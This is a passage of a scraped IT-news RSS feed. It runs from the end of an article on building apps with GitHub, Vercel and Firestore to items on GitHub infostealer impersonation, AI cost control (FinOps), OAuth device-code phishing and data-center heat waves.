<p class="wp-block-paragraph">Git plus GitHub gives you an enormous amount of power already, in terms of how you can organize and automate your projects. But there is a next-level experience in combining GitHub and Vercel. For <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html" data-type="link" data-id="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>-based projects, you can take simple GitHub pushes and turn them into instantly deployed clients and serverless functions. It is one of the cleanest and least fiddly ways to move from raw code on your local machine to a globally deployed, full-stack architecture.</p>



<h2 class="wp-block-heading">Vercel: the nexus</h2>



<p class="wp-block-paragraph">Vercel is more than just a deployment host. It is a control plane that ties this high-velocity, no-ops architecture together. Alongside GitHub and Firestore, Vercel’s deeper strength is its ability to act as an orchestration layer between your reactive front end and external stateful services.</p>



<p class="wp-block-paragraph">Vercel has a great amount of facility in fine-tuning what branches go to what environment and helpful features like instant rollback. You can just log into Vercel’s dashboard for your project and see the history of deployments and any errors and logs. It’s a simple menu choice to roll back to a historical version or compare one version against another.</p>



<p class="wp-block-paragraph">When you “stitch in” third-party services (such as a managed SQL database like <a href="https://www.infoworld.com/article/4168581/developing-local-first-apps-with-react-supabase-and-powersync.html" data-type="link" data-id="https://www.infoworld.com/article/4168581/developing-local-first-apps-with-react-supabase-and-powersync.html">Supabase</a> or a payment processor like Stripe), Vercel’s serverless functions become the lightweight interface, and Vercel’s the adapters handle the communication. You offload the integration logic (the service layer) to Vercel’s global Edge Network, keeping your UI and back end clean, responsive, and decoupled. </p>



<p class="wp-block-paragraph">In short, Vercel allows you to get the speed of the “no-ops” development life cycle without sacrificing the complex transactional integrity required for some applications like enterprise inventory systems. </p>



<h2 class="wp-block-heading">Firestore: the datastore</h2>



<p class="wp-block-paragraph">Firestore is an extremely lightweight, NoSQL, cloud datastore. It has a great deal of add-on power, but its core value proposition is that it accepts virtually any data you stuff into it and it provides event-driven subscriptions to data changes.</p>



<p class="wp-block-paragraph">These two capabilities together make Firestore about as straightforward a solution to a managed back end as you can imagine. You subscribe to collections or even fields and then you simply stick “unstructured” data (read: JSON with variable fields) in and the client waits for the changes it is interested in.</p>



<p class="wp-block-paragraph">This is so streamlined that one can just point the browser (or native mobile app) directly at Firestore and listen for events. Which immediately raises the question of identity, for auth and for data visibility, but hold on—Firestore’s third superpower is that it has an authentication module <em>that actually works. </em>What I mean is, it is actually pretty simple and yet confidently secures your app.</p>



<p class="wp-block-paragraph">Sometimes auth solutions seem either too simple (and yet opaque) or too mired in the nitty gritty. <a href="https://docs.cloud.google.com/firestore/native/docs/authentication" data-type="link" data-id="https://docs.cloud.google.com/firestore/native/docs/authentication">Firestore auth</a> will let you do some basic configuration and start using a reasonable auth almost immediately. </p>



<p class="wp-block-paragraph">Not to belabor the point, but having a realistic and attainable auth solution elevates your stack to a production grade—one that can handle many real-world applications. Firestore auth plays nicely with other important APIs, like Stripe. Typically, auth is a major feature that feels like off-roading in a Honda Civic, but Firestore’s approach to auth, <em>added to this particular stack</em>, feels like a normal speed bump. It’s just another component you plug in, rather than a tentacled alien you weave into the your code.</p>



<h2 class="wp-block-heading">The limits of the velocity stack</h2>



<p class="wp-block-paragraph">This architecture combines components that are optimized for flexibility. That same character also introduces distinct limitations. Understanding these is essential before committing production workloads.</p>



<h3 class="wp-block-heading">The serverless life cycle</h3>



<p class="wp-block-paragraph">Serverless functions are spun up to handle requests. They close out soon afterward and lose any state. For that reason, they cannot natively hold open persistent WebSockets. If your system requires continuous, sub-millisecond, bidirectional streams—like a real-time multiplayer action game or a high-frequency trading dashboard—pure serverless will fight you all the way. You are forced to introduce a third-party managed WebSocket service to route messages back to your stateless endpoints via HTTP webhooks.</p>



<h3 class="wp-block-heading">The execution time ceiling</h3>



<p class="wp-block-paragraph">Vercel (like all serverless platforms) enforces strict timeouts on operations. While enterprise tiers might grant you up to 15 minutes, standard functions often time out after 10 to 60 seconds. Long-running tasks like video transcoding, database scripts, or orchestrating multi-step AI agent workflows, which might take 20 minutes to resolve, will run up against these limits. Heavy-lifting tasks must be offloaded to a dedicated, long-running service like Google Cloud Run, or broken into smaller, asynchronous chunks via message queues.</p>



<h3 class="wp-block-heading">The cold start reality</h3>



<p class="wp-block-paragraph">While the industry has made massive strides in minimizing initialization times—particularly with lightweight edge networks—traditional Node.js-based serverless functions still experience cold starts. If a function has not been invoked recently, or if traffic spikes require a new instance to spin up concurrently, the first request will take a noticeable latency hit as the container provisions and the code loads.</p>



<h3 class="wp-block-heading">API instead of RAM</h3>



<p class="wp-block-paragraph">In a traditional server environment, you can store transient data in global RAM, allowing subsequent requests to access shared context instantly. In the serverless model, every request might hit a fresh container. Therefore, <em>all</em> shared context must be externalized. Although Firestore serves brilliantly as the state manager, relying on a database for high-frequency, sub-millisecond, ephemeral caching introduces network latency and per-operation costs. That said, using a shared RAM state on a server is non-trivial also, unless you are using a single app server and VM (because high-availability or fail-over requirements will lessen the RAM win on a traditional server).</p>



<h2 class="wp-block-heading">Tuning for velocity and control</h2>



<p class="wp-block-paragraph">Every architectural decision is a trade-off. There are no cost-free choices. By adopting the GitHub, Vercel, and Firestore stack, you are explicitly maximizing feature velocity over fine-grained control.</p>



<p class="wp-block-paragraph">You lose the ability to tweak the underlying operating system, hold open persistent sockets, or run hour-long back-end scripts. In exchange, you gain an architecture that scales from zero to global distribution instantly, requires virtually no devops maintenance, and perfectly absorbs the asynchronous, event-driven realities of modern application development.</p>



<p class="wp-block-paragraph">For the right application—whether it is a fast-moving prototype or an enterprise AI copilot—this stack doesn’t just save time; it fundamentally changes how quickly a small team (or a single person) can impact the market. You stop worrying about build chains, load balancers, and server patches, and you focus on the central mission: shipping features.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat actor impersonated hundreds of brands on GitHub to push infostealer malware]]></title>
<description><![CDATA[A financially motivated threat actor is impersonating hundreds of brands on GitHub and pushing a smash-and-grab infostealer masquerading as legitimate downloads of popular software, Arctic Wolf threat researchers have warned. “The 292 impersonated repositories span security tooling, fintech and p...]]></description>
<link>https://tsecurity.de/de/3671036/it-security-nachrichten/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671036/it-security-nachrichten/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/</guid>
<pubDate>Wed, 15 Jul 2026 16:55:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated threat actor is impersonating hundreds of brands on GitHub and pushing a smash-and-grab infostealer masquerading as legitimate downloads of popular software, Arctic Wolf threat researchers have warned. “The 292 impersonated repositories span security tooling, fintech and personal…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/">Threat actor impersonated hundreds of brands on GitHub to push infostealer malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat actor impersonated hundreds of brands on GitHub to push infostealer malware]]></title>
<description><![CDATA[A financially motivated threat actor is impersonating hundreds of brands on GitHub and pushing a smash-and-grab infostealer masquerading as legitimate downloads of popular software, Arctic Wolf threat researchers have warned. “The 292 impersonated repositories span security tooling, fintech and p...]]></description>
<link>https://tsecurity.de/de/3670894/it-security-nachrichten/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670894/it-security-nachrichten/threat-actor-impersonated-hundreds-of-brands-on-github-to-push-infostealer-malware/</guid>
<pubDate>Wed, 15 Jul 2026 16:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated threat actor is impersonating hundreds of brands on GitHub and pushing a smash-and-grab infostealer masquerading as legitimate downloads of popular software, Arctic Wolf threat researchers have warned. “The 292 impersonated repositories span security tooling, fintech and personal finance, cryptocurrency wallets and exchanges, developer and productivity tools, secure email providers, macOS utilities, and gaming software, including ‘cheat’ tools,” they said. How the attack works Among these repositories was one impersonating Arctic Wolf, which … <a href="https://www.helpnetsecurity.com/2026/07/15/impersonated-brands-github-infostealer-download/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/15/impersonated-brands-github-infostealer-download/">Threat actor impersonated hundreds of brands on GitHub to push infostealer malware</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SASE Has An AI Blind Spot. Inspecting Packets Is No Longer Enough.]]></title>
<description><![CDATA[For years, routing traffic through cloud proxies was good enough. Then work moved to the browser, AI entered the workflow, and the inspection model stopped keeping up.

Enterprise workflows now live across SaaS applications, browsers, and an expanding ecosystem of generative AI tools, unsanctione...]]></description>
<link>https://tsecurity.de/de/3670701/it-security-nachrichten/sase-has-an-ai-blind-spot-inspecting-packets-is-no-longer-enough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670701/it-security-nachrichten/sase-has-an-ai-blind-spot-inspecting-packets-is-no-longer-enough/</guid>
<pubDate>Wed, 15 Jul 2026 14:51:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For years, routing traffic through cloud proxies was good enough. Then work moved to the browser, AI entered the workflow, and the inspection model stopped keeping up.

Enterprise workflows now live across SaaS applications, browsers, and an expanding ecosystem of generative AI tools, unsanctioned browser extensions, and autonomous agents. Employees routinely paste intellectual property into]]></content:encoded>
</item>
<item>
<title><![CDATA[5 ways for CIOs to avoid AI bill shock]]></title>
<description><![CDATA[Gen AI spending is moving beyond the familiar software model of seats, licenses, and pilots. As AI shifts from copilots to embedded workflows and autonomous agents, one user request can trigger multiple model calls, retrieval steps, retries, orchestration layers, and infrastructure events. A tool...]]></description>
<link>https://tsecurity.de/de/3670246/it-security-nachrichten/5-ways-for-cios-to-avoid-ai-bill-shock/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670246/it-security-nachrichten/5-ways-for-cios-to-avoid-ai-bill-shock/</guid>
<pubDate>Wed, 15 Jul 2026 12:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Gen AI spending is moving beyond the familiar software model of seats, licenses, and pilots. As AI shifts from copilots to embedded workflows and autonomous agents, one user request can trigger multiple model calls, retrieval steps, retries, orchestration layers, and infrastructure events. A tool that looks affordable in pilot may behave very differently once connected to production systems or allowed to act with less human supervision.</p>



<p class="wp-block-paragraph">According to Michael Corrigan, CIO of World Insurance Associates, AI introduces a fundamentally different cost model — one that’s usage driven, non-linear, and tightly coupled to business activity. “Success requires shifting from traditional IT budgeting to FinOps-style discipline where consumption, value, and governance are actively managed in real time,” he says.</p>



<p class="wp-block-paragraph">Here are five ways CIOs can build that discipline before AI costs spiral.</p>



<h2 class="wp-block-heading">Forecast AI by workflow, not by user</h2>



<p class="wp-block-paragraph">At World, a top 25 insurance broker with about 3,000 employees across roughly 300 locations, AI use falls into three broad categories, Corrigan says. One is broad tools, such as copilots. Another is embedded AI inside SaaS platforms. And the third is bespoke AI built around specific workflows and manual processes.</p>



<p class="wp-block-paragraph">“The bespoke is the area that’s growing the most right now,” he says. “And that’s where the model, from a cost perspective, has really been shifting from a license seat cost to a token consumption or token burn cost, or even a hybrid.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Michael Corrigan, CIO, World Insurance Associates</p>
</figcaption></figure><p class="imageCredit">WIA</p></div>



<p class="wp-block-paragraph">Seat-based pricing is relatively easy to forecast whereas consumption-based AI isn’t. Costs may depend on prompt complexity, output length, model choice, workflow design, and whether the system calls a model once or many times in the background.</p>



<p class="wp-block-paragraph">World tries to manage that uncertainty by defining the business problem, success criteria, and expected operational improvement upfront. Pilots help estimate consumption before scaling, but Corrigan says they don’t remove the ambiguity.</p>



<p class="wp-block-paragraph">“We’ll try our best in the pilot to understand what the consumption rate is, what the token burn rate is,” he says. But once a consumption-based workflow goes into production, he adds, an estimate is put into place. That estimate is informed, but still rough.</p>



<p class="wp-block-paragraph">Elmer Morales, founder and CEO of koder.com, an agentic AI coding startup, says CIOs should think less about headcount and more about <a href="https://www.cio.com/article/4163373/cios-bring-ai-transformation-home-to-it-workflows.html?utm=hybrid_search">workflow mechanics</a>. Agentic AI costs are driven by the number of decisions an agent makes, how often it retrieves external data, how much context it carries, and how many systems it touches.</p>



<p class="wp-block-paragraph">“CIOs should start by mapping workflows, not necessarily users,” he says. “The relevant variable isn’t going to be the headcount but how many decisions an agent makes per task.”</p>



<h2 class="wp-block-heading">Model the failure path, not just the happy path</h2>



<p class="wp-block-paragraph">Pilots can mislead because they often test the cleanest version of an AI workflow. Morales says many enterprises model agentic AI costs around the happy path: the user gives a clear prompt, the system understands the request, the agent completes the task, and the process ends. Production is messier.</p>



<p class="wp-block-paragraph">“They generally don’t model for situations where the agent is going to need to go back and check its work and redo things,” Morales says. “A lot of times, agents are wrong, either because they hallucinate or they understood the problem incorrectly.”</p>



<p class="wp-block-paragraph">In an agentic workflow, the system may check its work, call another tool, retrieve more data, or redo a step. While that may improve quality, it also adds cost.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Elmer Morales, founder and CEO, koder.com</p>
</figcaption></figure><p class="imageCredit">koder.com</p></div>



<p class="wp-block-paragraph">The difference between copilots and <a href="https://www.cio.com/article/3603856/agentic-ai-promising-use-cases-for-business.html?utm=hybrid_search">agents</a> is central. A copilot interaction is often one prompt and one response. An agentic workflow may involve agents moving through a decision tree, executing tasks in sequence or in parallel, and calling sub-agents or external systems along the way. “By the time it’s achieved the original goal, the agent might have made 50 or 100 model calls, compared with a single call for a traditional copilot prompt,” Morales says.</p>



<p class="wp-block-paragraph">That’s why CIOs should require teams to model the failure path before production, like how many retries are allowed, how much context is resent, which tools can be called, when a human should intervene, and what happens when the agent can’t complete the task.</p>



<h2 class="wp-block-heading">Build cost controls into the architecture</h2>



<p class="wp-block-paragraph">Traditional FinOps practices still matter, but AI requires more than retrospective dashboards and chargebacks.</p>



<p class="wp-block-paragraph">According to Pavan Madduri, senior cloud platform engineer at industrial supply company Graigner, looking backward at usage data, as traditional FinOps often does, can be too late. Costs are shaped by prompt design, model selection, agent behavior, orchestration choices, and runtime loops.</p>



<p class="wp-block-paragraph">“Dashboards or chargebacks, those are historical accounting,” he says. “The money’s already gone.” For AI, he argues, cost controls need to be embedded into the architecture. That includes hard token caps, retry-depth limits, maximum runtime limits, workload prioritization, background-job throttling, and cluster-level controls that prevent runaway consumption.</p>



<p class="wp-block-paragraph">“The real FinOps means you need to have the cost constraints embedded into your architecture framework,” Madduri says.</p>



<p class="wp-block-paragraph">Those controls also extend to infrastructure. Expensive GPUs may sit warm between jobs because systems need capacity available when inference demand arrives. Teams may pass huge schemas, databases, or thousands of lines of code into frontier models when a smaller or more focused prompt would do.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="828" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Pavan Madduri, senior cloud platform engineer, Graigner</p>
</figcaption></figure><p class="imageCredit">Graigner</p></div>



<p class="wp-block-paragraph">Enterprises should also adopt event-driven autoscaling, Madduri says. “Use tools like KEDA to scale GPU nodes down to zero the moment inference demand drops, so teams only pay for the windows when the silicon is actively crunching tokens.”</p>



<p class="wp-block-paragraph">Corrigan says World uses rate limits, spend limits, alerts, and approval gateways for consumption-based tools. When users approach token consumption limits, automated alerts allow IT and the business to review whether the continued spend is justified.</p>



<p class="wp-block-paragraph">“If it’s not meeting the success criteria we expected, you have to have the control in place to say we’re going to move on or kill that process,” Corrigan says.</p>



<h2 class="wp-block-heading">Route work to the right model</h2>



<p class="wp-block-paragraph">CIOs can also reduce <a href="https://www.cio.com/article/4152601/without-controls-an-ai-agent-can-cost-more-than-an-employee.html?utm=hybrid_search">AI bill shock</a> by avoiding a default assumption that every task requires the most powerful model available. While some tasks need advanced reasoning, many others don’t. A simple support ticket, log-parsing task, or structured database transaction may be handled by a smaller or cheaper model. A complex architecture decision, legal analysis, or multi-step reasoning task may justify a more powerful one.</p>



<p class="wp-block-paragraph">“Choosing the right model for the right prompt and right question — that’s where you leverage the maximum from that model, and you can decrease the costing,” Madduri says. “If you default every single call to a frontier model, that’s architectural laziness.”</p>



<p class="wp-block-paragraph">Morales makes a similar point. Not every step in an agentic workflow requires a top-of-the-line model. Model routing, he says, is the discipline of determining the best model for the task, and providing the relevant context when the model needs it.</p>



<p class="wp-block-paragraph">According to Jim Olsen, CTO of enterprise software company ModelOp, CIOs should use the least expensive model that can accomplish the business goal. Using the biggest model for everything is easier, but expensive. “It’s like hiring the most expensive engineer to change a few colors in a website’s CSS, or visual styling,” he says. “You wouldn’t do that. You use the appropriate tools for the task.”</p>



<h2 class="wp-block-heading">Tie consumption to business value</h2>



<p class="wp-block-paragraph">For Olsen, the deeper enterprise problem is AI value shock, not just bill shock. Spending $200,000 in a quarter on AI is justified if it produces $2 million in business value. The problem is spending heavily on use cases that don’t generate a meaningful return.</p>



<p class="wp-block-paragraph">“Are you actually getting that return on investment, or are you just blowing tokens for something that’s not delivering the value to your business?” Olsen asks. Tracking token usage by user or department may show who consumed AI, but not whether the consumption mattered.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Jim Olsen, CTO, ModelOp</p>
</figcaption></figure><p class="imageCredit">ModelOp</p></div>



<p class="wp-block-paragraph">For most enterprise AI systems, Olsen says costs should be tied back to business use cases. A model may be used for HR document search, customer support, code review, problem resolution, or other functions. Each use case may draw on the same underlying models or agents, but the business value can be very different.</p>



<p class="wp-block-paragraph">That’s why he argues that companies need an AI inventory, a record of which business workflows use which models, agents, providers, workflows, and systems. Without that inventory, enterprises can’t connect consumption to value.</p>



<p class="wp-block-paragraph">Corrigan takes a similar approach from a governance perspective. At World, new AI ideas go through an intake process. Business users propose improvements, and IT, finance, operations, sales, and business stakeholders evaluate, prioritize, and monitor them from pilot through production.</p>



<p class="wp-block-paragraph">That may be where the next stage of AI FinOps is heading, toward a clearer understanding of which AI consumption deserves to scale, not just to lower bills. So the question, as Olsen puts it, isn’t whether someone used a million tokens. It’s what are they using them for.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe-Coding im Unternehmen: Wann sich SaaS-Ablösung wirklich lohnt]]></title>
<description><![CDATA[Vibe-Coding macht Software-Eigenbau für Nicht-Entwickler realistisch. Für manche Unternehmen kippt damit gerade eine Grundannahme – und mit ihr die SaaS-Rechnung.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3670204/it-nachrichten/vibe-coding-im-unternehmen-wann-sich-saas-abloesung-wirklich-lohnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670204/it-nachrichten/vibe-coding-im-unternehmen-wann-sich-saas-abloesung-wirklich-lohnt/</guid>
<pubDate>Wed, 15 Jul 2026 11:48:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vibe-Coding macht Software-Eigenbau für Nicht-Entwickler realistisch. Für manche Unternehmen kippt damit gerade eine Grundannahme – und mit ihr die SaaS-Rechnung.<a href="https://t3n.de/news/vibe-coding-im-unternehmen-wann-sich-saas-abloesung-wirklich-lohnt-1752172/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stripe, Advent reportedly propose to buy PayPal for more than $53bn]]></title>
<description><![CDATA[Stripe and Advent reportedly want equal stakes in the US fintech.
Read more: Stripe, Advent reportedly propose to buy PayPal for more than $53bn]]></description>
<link>https://tsecurity.de/de/3669912/it-nachrichten/stripe-advent-reportedly-propose-to-buy-paypal-for-more-than-53bn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669912/it-nachrichten/stripe-advent-reportedly-propose-to-buy-paypal-for-more-than-53bn/</guid>
<pubDate>Wed, 15 Jul 2026 09:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Stripe and Advent reportedly want equal stakes in the US fintech.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/business/stripe-advent-reportedly-propose-to-buy-paypal-for-more-than-53bn">Stripe, Advent reportedly propose to buy PayPal for more than $53bn</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse OAuth Device Codes and Entra ID Enrollment for Persistent SaaS Access]]></title>
<description><![CDATA[AI-enabled phishing-as-a-service operations are driving a sharp increase in identity attacks in 202620262026, with threat actors increasingly abusing OAuth device authorization flows and Microsoft Entra ID device enrollment to obtain durable access to SaaS environments. Jalisco is a device code p...]]></description>
<link>https://tsecurity.de/de/3669803/it-security-nachrichten/hackers-abuse-oauth-device-codes-and-entra-id-enrollment-for-persistent-saas-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669803/it-security-nachrichten/hackers-abuse-oauth-device-codes-and-entra-id-enrollment-for-persistent-saas-access/</guid>
<pubDate>Wed, 15 Jul 2026 08:52:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI-enabled phishing-as-a-service operations are driving a sharp increase in identity attacks in 202620262026, with threat actors increasingly abusing OAuth device authorization flows and Microsoft Entra ID device enrollment to obtain durable access to SaaS environments. Jalisco is a device code phishing toolkit that generates OAuth device codes in real time and captures the tokens issued […]</p>
<p>The post <a href="https://gbhackers.com/oauth-device-codes-and-entra-id-abused/">Hackers Abuse OAuth Device Codes and Entra ID Enrollment for Persistent SaaS Access</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How data centers cope with heat waves]]></title>
<description><![CDATA[Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have been reported in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from...]]></description>
<link>https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669125/it-security-nachrichten/how-data-centers-cope-with-heat-waves/</guid>
<pubDate>Tue, 14 Jul 2026 22:52:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Europe is sweltering. The summer of 2026 has seen historic heat waves that have taken a significant toll on infrastructure. In recent weeks, across the continent, problems have <a href="https://www.bbc.com/news/articles/cj0gez6d50ro" target="_blank" rel="noreferrer noopener">been reported</a> in the power grid, telecommunications, and rail transportation. IT infrastructure has not been spared from the situation.</p>



<p class="wp-block-paragraph">“The heat affects equipment long before anyone notices a problem,” explains Ricardo Román, sales director at Fracttal, in an email. “Every piece of equipment has a temperature range within which it is designed to operate, and when it operates above that range, it begins to degrade silently,” he says. A process of wear and tear begins that will eventually take its toll. With technology, this happens much faster. “In a data center, this effect is amplified because there’s no margin for error,” he notes. When something starts to fail, everything grinds to a halt.</p>



<p class="wp-block-paragraph">In fact, this latest heat wave has already had negative impacts on data centers outside of Spain. In the United Kingdom, high temperatures shut down hospital data centers and <a href="https://www.lavanguardia.com/neo/ia/20260707/11586247/ola-calor-deja-fuera-combate-mayores-superordenadores-ia-1-000-hervidores-agua-funcionando-vez.html" target="_blank" rel="noreferrer noopener">caused</a> the University of Cambridge’s Dawn supercomputer to go offline, as its cooling systems were unable to cope with the temperatures. That’s the crux of the problem. “In IT, heat isn’t a computing problem—it’s a problem of maintaining the assets that support the data center,” explains Román. </p>



<p class="wp-block-paragraph">Heat thus becomes yet another risk for the IT industry and, in particular, for data centers. </p>



<p class="wp-block-paragraph">Temperatures are a clear and growing concern when it comes to corporate risk prevention. “I see it in conversations with clients: In the past, the maintenance team was the one monitoring the temperature in a technical room,” Román says. “Today, management also monitors it, because they know that if that goes down, the service goes down—and behind the service is the end customer,” he adds. Maintenance has gone from being a cost “to a lever for business continuity that no one dares to touch.”</p>



<p class="wp-block-paragraph">As a World Economic Forum analysis warns, we’re experiencing a boom in AI-driven <a href="https://www.computerworld.es/article/4166490/especial-centros-de-datos-2026.html">data centers</a>, but the impact of climate risks on them is being overlooked. Their estimates <a href="https://www.weforum.org/stories/climate-action/data-centres-3-3-trillion-question-heat-cooling/">suggest</a> these risks could result in an additional annual cost of $81 billion by 2035 and $168 billion by 2065. These calculations include all kinds of threats, such as floods or droughts, but most of the impact comes from extreme heat.</p>



<p class="wp-block-paragraph">These projections are confirmed by data from the industry itself: Over the past three years, extreme weather events <a href="https://www.cnbc.com/2026/06/29/ai-data-centers-heatwave-climate-risk-weather.html" target="_blank" rel="noreferrer noopener">have accounted for</a> one-third of the losses incurred by the U.S. division of the data center company Zurich. According to projections by the climate risk analysis firm First Street, 79% of global data centers will face increased risks from extreme weather. MapleCroft estimated in 2025 that 56% of major data centers had a high or very high risk rating for extreme heat, and that <a href="https://www.cio.com/article/4041210/las-olas-de-calor-pueden-poner-en-jaque-a-los-centros-de-datos.html" target="_blank">this figure would rise to 80% by 2080</a>.</p>



<p class="wp-block-paragraph">These percentages cannot be easily extrapolated to Europe in general—and to Spain in particular—as one might think, although they do make the trend clear. Guillermo Benito, CTO of Nabiax, points out during a video call that these studies are based on global samples and thus place significant weight on the capacity of Asia and the United States. “We represent a small percentage there, but that said, all countries will have to adapt. The two major challenges for data centers are energy and cooling,” Benitonotes.</p>



<h2 class="wp-block-heading">Spain: A pioneer in heat?</h2>



<p class="wp-block-paragraph">In late June, French Labor Minister Jean-Pierre Farandou <a href="https://www.france24.com/es/minuto-a-minuto/20260630-francia-quiere-estudiar-el-modelo-espa%C3%B1ol-para-adaptar-la-sociedad-al-calor-extremo" target="_blank" rel="noreferrer noopener">proposed</a> taking a training course in Spain to learn how to prevent high temperatures from paralyzing a country. Although Spain’s climate varies by region, high summer temperatures are common in many areas (though climate change has made them more extreme and frequent in recent years), and the infrastructure of knowledge and solutions that Farandou wanted to learn about has been established. The big question is whether this also applies to data centers. Is Spain better prepared than other European regions?</p>



<p class="wp-block-paragraph">“Heat waves are becoming increasingly intense and frequent. What used to happen once every two years now happens two, three, or four times a year,” Benito says. Speaking from his own experience, he adds: “In Spain, data centers already take these factors into account.” When it comes to redundancy, monitoring, or maintenance, these factors are already factored in. “It’s not like it’s an unforeseen event. It’s already been taken into account, and we build in a lot of redundancy—a wide safety margin,” he says.</p>



<p class="wp-block-paragraph">The difference compared to central or northern Europe is that some haven’t considered this possibility. Benito points out that the same thing happens with homes. “For many years, they’ve been designing with two assumptions: that they have plenty of water because their climates are humid, and that it never gets hot,” he says. And this is a problem, because their summer temperatures have risen significantly during extreme heat waves. “Temperatures in the UK have gone up by 10 or 15 degrees, and their data centers aren’t prepared for that,” he says. In fact, he shares an anecdote about “a certain hyperscaler that, a few years ago, when its data centers in the United Kingdom went down, held a global conference to figure out how this had happened and draw lessons from it.” The curious thing is that what they learned was something that was already well known in Spain.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/ismail-enes-ayhan-lVZjvw-u9V8-unsplash.jpg?quality=50&amp;strip=all&amp;w=1024" alt="centro de datos" class="wp-image-4094600" width="1024" height="589" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">İsmail Enes Ayhan | Unsplash</p></div>



<p class="wp-block-paragraph">It was already getting hot in southern Europe, and preparations were needed. Now, temperatures are becoming a topic of conversation outside the region, and climate change has made its way into IT strategy. Benito confirms that, yes, the conversation is more visible in global settings. “For several reasons. The first is because, obviously, it affects operations. Another is the market. Customers also demand that you address this.” Before, the focus was on power capacity and square meters. Now, the expert points out, people are asking where the electricity comes from and whether it’s clean, and they’re demanding emissions guarantees. The sector is making significant investments to become sustainable, he argues.</p>



<p class="wp-block-paragraph">Beyond consumption data and the improvements that can be made, the big question is whether these high temperatures are already impacting decision-making—whether decisions on where to locate data centers (or not) are already being made with heat in mind.</p>



